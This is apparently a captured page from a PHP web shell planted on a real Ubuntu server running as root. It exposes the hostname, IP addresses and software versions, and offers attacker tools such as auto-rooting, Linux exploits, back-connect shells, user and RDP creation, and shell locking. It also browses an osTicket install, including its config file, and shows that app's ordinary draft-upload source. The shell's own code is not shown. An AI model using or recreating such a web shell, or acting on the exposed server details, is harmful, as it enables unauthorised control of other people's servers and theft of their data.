Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
osticket /
upload /
include /
[ HOME SHELL ]
Name
Size
Permission
Action
cli
[ DIR ]
drwxr-xr-x
client
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
fpdf
[ DIR ]
drwxr-xr-x
i18n
[ DIR ]
drwxr-xr-x
mpdf
[ DIR ]
drwxr-xr-x
pear
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
staff
[ DIR ]
drwxr-xr-x
upgrader
[ DIR ]
drwxr-xr-x
.MANIFEST
163.74
KB
-rw-r--r--
.htaccess
14
B
-rw-r--r--
JSON.php
33.13
KB
-rw-r--r--
PasswordHash.php
6.92
KB
-rw-r--r--
Spyc.php
31.73
KB
-rw-r--r--
UniversalClassLoader.php
8.61
KB
-rw-r--r--
ajax.admin.php
7.21
KB
-rw-r--r--
ajax.config.php
4.55
KB
-rw-r--r--
ajax.content.php
9.47
KB
-rw-r--r--
ajax.draft.php
12.72
KB
-rw-r--r--
ajax.export.php
1006
B
-rw-r--r--
ajax.filter.php
874
B
-rw-r--r--
ajax.forms.php
13.3
KB
-rw-r--r--
ajax.i18n.php
4.91
KB
-rw-r--r--
ajax.kbase.php
2.93
KB
-rw-r--r--
ajax.note.php
2.05
KB
-rw-r--r--
ajax.orgs.php
11.7
KB
-rw-r--r--
ajax.schedule.php
4.29
KB
-rw-r--r--
ajax.search.php
12.35
KB
-rw-r--r--
ajax.sequence.php
3.2
KB
-rw-r--r--
ajax.staff.php
7.84
KB
-rw-r--r--
ajax.tasks.php
30.25
KB
-rw-r--r--
ajax.thread.php
8.89
KB
-rw-r--r--
ajax.tickets.php
74
KB
-rw-r--r--
ajax.tips.php
1.66
KB
-rw-r--r--
ajax.upgrader.php
2.24
KB
-rw-r--r--
ajax.users.php
17.8
KB
-rw-r--r--
api.cron.php
909
B
-rw-r--r--
api.tickets.php
8.26
KB
-rw-r--r--
class.ajax.php
1.42
KB
-rw-r--r--
class.api.php
13.14
KB
-rw-r--r--
class.app.php
1.47
KB
-rw-r--r--
class.attachment.php
6.87
KB
-rw-r--r--
class.auth.php
43.91
KB
-rw-r--r--
class.avatar.php
6.43
KB
-rw-r--r--
class.banlist.php
2.54
KB
-rw-r--r--
class.base32.php
4.06
KB
-rw-r--r--
class.businesshours.php
6.72
KB
-rw-r--r--
class.canned.php
8.58
KB
-rw-r--r--
class.captcha.php
1.73
KB
-rw-r--r--
class.category.php
11.04
KB
-rw-r--r--
class.charset.php
3.4
KB
-rw-r--r--
class.cli.php
9.48
KB
-rw-r--r--
class.client.php
15.02
KB
-rw-r--r--
class.collaborator.php
5.44
KB
-rw-r--r--
class.company.php
2.65
KB
-rw-r--r--
class.config.php
58.51
KB
-rw-r--r--
class.cron.php
3.54
KB
-rw-r--r--
class.crypto.php
18.96
KB
-rw-r--r--
class.csrf.php
2.36
KB
-rw-r--r--
class.dept.php
32.39
KB
-rw-r--r--
class.dispatcher.php
6.72
KB
-rw-r--r--
class.draft.php
6.25
KB
-rw-r--r--
class.dynamic_forms.php
62.12
KB
-rw-r--r--
class.email.php
18.09
KB
-rw-r--r--
class.error.php
1.69
KB
-rw-r--r--
class.export.php
31.8
KB
-rw-r--r--
class.faq.php
15.05
KB
-rw-r--r--
class.file.php
32.41
KB
-rw-r--r--
class.filter.php
27.75
KB
-rw-r--r--
class.filter_action.php
20.27
KB
-rw-r--r--
class.format.php
40.68
KB
-rw-r--r--
class.forms.php
183.13
KB
-rw-r--r--
class.http.php
5.52
KB
-rw-r--r--
class.i18n.php
24.2
KB
-rw-r--r--
class.import.php
6.44
KB
-rw-r--r--
class.json.php
2.69
KB
-rw-r--r--
class.knowledgebase.php
5.8
KB
-rw-r--r--
class.list.php
41.85
KB
-rw-r--r--
class.lock.php
4.05
KB
-rw-r--r--
class.log.php
1.54
KB
-rw-r--r--
class.mailer.php
24.05
KB
-rw-r--r--
class.mailfetch.php
37.24
KB
-rw-r--r--
class.mailparse.php
26.7
KB
-rw-r--r--
class.message.php
6.4
KB
-rw-r--r--
class.migrater.php
5.2
KB
-rw-r--r--
class.misc.php
8.15
KB
-rw-r--r--
class.model.php
2.3
KB
-rw-r--r--
class.nav.php
14.14
KB
-rw-r--r--
class.note.php
2.39
KB
-rw-r--r--
class.organization.php
22.44
KB
-rw-r--r--
class.orm.php
119.54
KB
-rw-r--r--
class.osticket.php
18.8
KB
-rw-r--r--
class.ostsession.php
9.82
KB
-rw-r--r--
class.page.php
10.65
KB
-rw-r--r--
class.pagenate.php
5.13
KB
-rw-r--r--
class.passwd.php
1.19
KB
-rw-r--r--
class.pdf.php
3.62
KB
-rw-r--r--
class.plugin.php
23.89
KB
-rw-r--r--
class.priority.php
1.81
KB
-rw-r--r--
class.queue.php
102.01
KB
-rw-r--r--
class.report.php
11.47
KB
-rw-r--r--
class.role.php
11.12
KB
-rw-r--r--
class.schedule.php
46.03
KB
-rw-r--r--
class.search.php
56.26
KB
-rw-r--r--
class.sequence.php
7.27
KB
-rw-r--r--
class.setup.php
3.55
KB
-rw-r--r--
class.signal.php
4.16
KB
-rw-r--r--
class.sla.php
8.64
KB
-rw-r--r--
class.staff.php
52.41
KB
-rw-r--r--
class.task.php
49.97
KB
-rw-r--r--
class.team.php
12.01
KB
-rw-r--r--
class.template.php
23.33
KB
-rw-r--r--
class.thread.php
107.11
KB
-rw-r--r--
class.thread_actions.php
17.08
KB
-rw-r--r--
class.ticket.php
162.72
KB
-rw-r--r--
class.timezone.php
21.94
KB
-rw-r--r--
class.topic.php
19.07
KB
-rw-r--r--
class.translation.php
34.38
KB
-rw-r--r--
class.upgrader.php
13.54
KB
-rw-r--r--
class.user.php
42.45
KB
-rw-r--r--
class.usersession.php
4.99
KB
-rw-r--r--
class.util.php
8.01
KB
-rw-r--r--
class.validator.php
12.05
KB
-rw-r--r--
class.variable.php
11.93
KB
-rw-r--r--
class.xml.php
3.23
KB
-rw-r--r--
class.yaml.php
1.16
KB
-rw-r--r--
htmLawed.php
53.53
KB
-rw-r--r--
html2text.php
33.63
KB
-rw-r--r--
index.php
37
B
-rw-r--r--
mysqli.php
8.55
KB
-rw-r--r--
ost-config.php
5.61
KB
-rw-r--r--
ost-sampleconfig.php
5.62
KB
-rw-r--r--
tnef_decoder.php
19.82
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ajax.draft.php
<?php if(!defined('INCLUDE_DIR')) die('!'); require_once(INCLUDE_DIR.'class.draft.php'); class DraftAjaxAPI extends AjaxController { function _createDraft($vars) { if (false === ($vars['body'] = self::_findDraftBody($_POST))) return JsonDataEncoder::encode(array( 'error' => __("Draft body not found in request"), 'code' => 422, )); if (!($draft = Draft::create($vars)) || !$draft->save()) Http::response(500, 'Unable to create draft'); echo JsonDataEncoder::encode(array( 'draft_id' => $draft->getId(), )); } function _getDraft($draft) { if (!$draft || !$draft instanceof Draft) Http::response(205, "Draft not found. Create one first"); $body = Format::viewableImages($draft->getBody()); echo JsonDataEncoder::encode(array( 'body' => $body, 'draft_id' => $draft->getId(), )); } function _updateDraft($draft) { if (false === ($body = self::_findDraftBody($_POST))) return JsonDataEncoder::encode(array( 'error' => array( 'message' => "Draft body not found in request", 'code' => 422, ) )); if (!$draft->setBody($body)) return Http::response(500, "Unable to update draft body"); echo "{}"; } function _uploadInlineImage($draft) { global $cfg; if (!isset($_POST['data']) && !isset($_FILES['file'])) Http::response(422, "File not included properly"); # Fixup for expected multiple attachments if (isset($_FILES['file'])) { $file = AttachmentFile::format($_FILES['file']); # Allow for data-uri uploaded files $fp = fopen($file[0]['tmp_name'], 'rb'); if (fread($fp, 5) == 'data:') { $data = 'data:'; while ($block = fread($fp, 8192)) $data .= $block; $file[0] = Format::parseRfc2397($data); list(,$ext) = explode('/', $file[0]['type'], 2); $file[0] += array( 'name' => Misc::randCode(8).'.'.$ext, 'size' => strlen($file[0]['data']), ); } fclose($fp); # TODO: Detect unacceptable attachment extension # TODO: Verify content-type and check file-content to ensure image $type = $file[0]['type']; if (strpos($file[0]['type'], 'image/') !== 0) return Http::response(403, JsonDataEncoder::encode(array( 'error' => 'File type is not allowed', )) ); # TODO: Verify file size is acceptable if ($file[0]['size'] > $cfg->getMaxFileSize()) return Http::response(403, JsonDataEncoder::encode(array( 'error' => 'File is too large', )) ); // Paste uploads in Chrome will have a name of 'blob' if ($file[0]['name'] == 'blob') $file[0]['name'] = 'screenshot-'.Misc::randCode(4); $ids = $draft->attachments->upload($file); if (!$ids) { if ($file[0]['error']) { return Http::response(403, JsonDataEncoder::encode(array( 'error' => $file[0]['error'], )) ); } else return Http::response(500, 'Unable to attach image'); } $id = (is_array($ids)) ? $ids[0] : $ids; } else { $type = explode('/', $_POST['contentType']); $info = array( 'data' => base64_decode($_POST['data']), 'name' => Misc::randCode(10).'.'.$type[1], // TODO: Ensure _POST['contentType'] 'type' => $_POST['contentType'], ); // TODO: Detect unacceptable filetype // TODO: Verify content-type and check file-content to ensure image $id = $draft->attachments->save($info); } if (!($f = AttachmentFile::lookup($id))) return Http::response(500, 'Unable to attach image'); echo JsonDataEncoder::encode(array( $f->getName() => array( 'content_id' => 'cid:'.$f->getKey(), 'id' => $f->getKey(), // Return draft_id to connect the auto draft creation 'draft_id' => $draft->getId(), 'url' => $f->getDownloadUrl( ['type' => 'D', 'deposition' => 'inline']), ))); } // Client interface for drafts ======================================= function createDraftClient($namespace) { global $thisclient; if (!$thisclient && substr($namespace, -12) != substr(session_id(), -12)) Http::response(403, "Valid session required"); $vars = array( 'namespace' => $namespace, ); return self::_createDraft($vars); } function getDraftClient($namespace) { global $thisclient; if ($thisclient) { try { $draft = Draft::lookupByNamespaceAndStaff($namespace, $thisclient->getId()); } catch (DoesNotExist $e) { Http::response(205, "Draft not found. Create one first"); } } else { if (substr($namespace, -12) != substr(session_id(), -12)) Http::response(404, "Draft not found"); try { $draft = Draft::lookupByNamespaceAndStaff($namespace, 0); } catch (DoesNotExist $e) { Http::response(205, "Draft not found. Create one first"); } } return self::_getDraft($draft); } function updateDraftClient($id) { global $thisclient; if (!($draft = Draft::lookup($id))) Http::response(205, "Draft not found. Create one first"); // Check the owning client-id (for logged-in users), and the // session_id() for others elseif ($thisclient) { if ($draft->getStaffId() != $thisclient->getId()) Http::response(404, "Draft not found"); } else { if (substr(session_id(), -12) != substr($draft->getNamespace(), -12)) Http::response(404, "Draft not found"); } return self::_updateDraft($draft); } function deleteDraftClient($id) { global $thisclient; if (!($draft = Draft::lookup($id))) Http::response(205, "Draft not found. Create one first"); elseif ($thisclient) { if ($draft->getStaffId() != $thisclient->getId()) Http::response(404, "Draft not found"); } else { if (substr(session_id(), -12) != substr($draft->getNamespace(), -12)) Http::response(404, "Draft not found"); } $draft->delete(); } function uploadInlineImageClient($id) { global $thisclient; if (!($draft = Draft::lookup($id))) Http::response(205, "Draft not found. Create one first"); elseif ($thisclient) { if ($draft->getStaffId() != $thisclient->getId()) Http::response(404, "Draft not found"); } else { if (substr(session_id(), -12) != substr($draft->getNamespace(), -12)) Http::response(404, "Draft not found"); } return self::_uploadInlineImage($draft); } function uploadInlineImageEarlyClient($namespace) { global $thisclient; if (!$thisclient && substr($namespace, -12) != substr(session_id(), -12)) Http::response(403, "Valid session required"); $draft = Draft::create(array( 'namespace' => $namespace, )); if (!$draft->save()) Http::response(500, 'Unable to create draft'); return $this->uploadInlineImageClient($draft->getId()); } // Staff interface for drafts ======================================== function createDraft($namespace) { global $thisstaff; if (!$thisstaff) Http::response(403, "Login required for draft creation"); $vars = array( 'namespace' => $namespace, ); return self::_createDraft($vars); } function getDraft($namespace) { global $thisstaff; if (!$thisstaff) Http::response(403, "Login required for draft creation"); try { $draft = Draft::lookupByNamespaceAndStaff($namespace, $thisstaff->getId()); } catch (DoesNotExist $e) { Http::response(205, "Draft not found. Create one first"); } return self::_getDraft($draft); } function updateDraft($id) { global $thisstaff; if (!$thisstaff) Http::response(403, "Login required for image upload"); elseif (!($draft = Draft::lookup($id))) Http::response(205, "Draft not found. Create one first"); elseif ($draft->getStaffId() != $thisstaff->getId()) Http::response(404, "Draft not found"); return self::_updateDraft($draft); } function uploadInlineImage($draft_id) { global $thisstaff; if (!$thisstaff) Http::response(403, "Login required for image upload"); elseif (!($draft = Draft::lookup($draft_id))) Http::response(205, "Draft not found. Create one first"); elseif ($draft->getStaffId() != $thisstaff->getId()) Http::response(404, "Draft not found"); return self::_uploadInlineImage($draft); } function uploadInlineImageEarly($namespace) { global $thisstaff; if (!$thisstaff) Http::response(403, "Login required for image upload"); $draft = Draft::create(array( 'namespace' => $namespace )); if (!$draft->save()) Http::response(500, 'Unable to create draft'); return $this->uploadInlineImage($draft->getId()); } function deleteDraft($id) { global $thisstaff; if (!$thisstaff) Http::response(403, "Login required for draft edits"); elseif (!($draft = Draft::lookup($id))) Http::response(205, "Draft not found. Create one first"); elseif ($draft->getStaffId() != $thisstaff->getId()) Http::response(404, "Draft not found"); $draft->delete(); } function getFileList() { global $thisstaff; if (!$thisstaff) Http::response(403, "Login required for file queries"); $search = Q::any([ Q::all([ 'attachments__type__in' => array('C', 'F', 'T', 'P'), 'attachments__inline' => 1, ]), 'ft' => 'L', ]); if (isset($_GET['threadId']) && is_numeric($_GET['threadId']) && ($thread = Thread::lookup($_GET['threadId'])) && ($object = $thread->getObject()) && ($thisstaff->canAccess($object)) ) { $search->add(Q::all([ 'attachments__thread_entry__thread_id' => $_GET['threadId'], 'attachments__inline' => 1, ])); } $images = AttachmentFile::objects()->filter([ $search, 'type__startswith' => 'image/', ])->distinct('id'); $files = array(); foreach ($images as $f) { $url = $f->getDownloadUrl(); $files[] = array( // Don't send special sizing for thread items 'cause they // should be cached already by the client 'thumb' => $url.($f->type != 'H' ? '&s=128' : ''), 'url' => $url, 'title' => $f->getName(), ); } echo JsonDataEncoder::encode($files); } function _findDraftBody($vars) { if (isset($vars['name'])) { $parts = array(); // Support nested `name`, like trans[lang] if (preg_match('`(\w+)(?:\[(\w+)\])?(?:\[(\w+)\])?`', $_POST['name'], $parts)) { array_shift($parts); $focus = $vars; foreach ($parts as $p) $focus = $focus[$p]; return $focus; } } $field_list = array('response', 'note', 'answer', 'body', 'message', 'issue', 'description'); foreach ($field_list as $field) { if (isset($vars[$field])) { return $vars[$field]; } } return false; } } ?>
Close
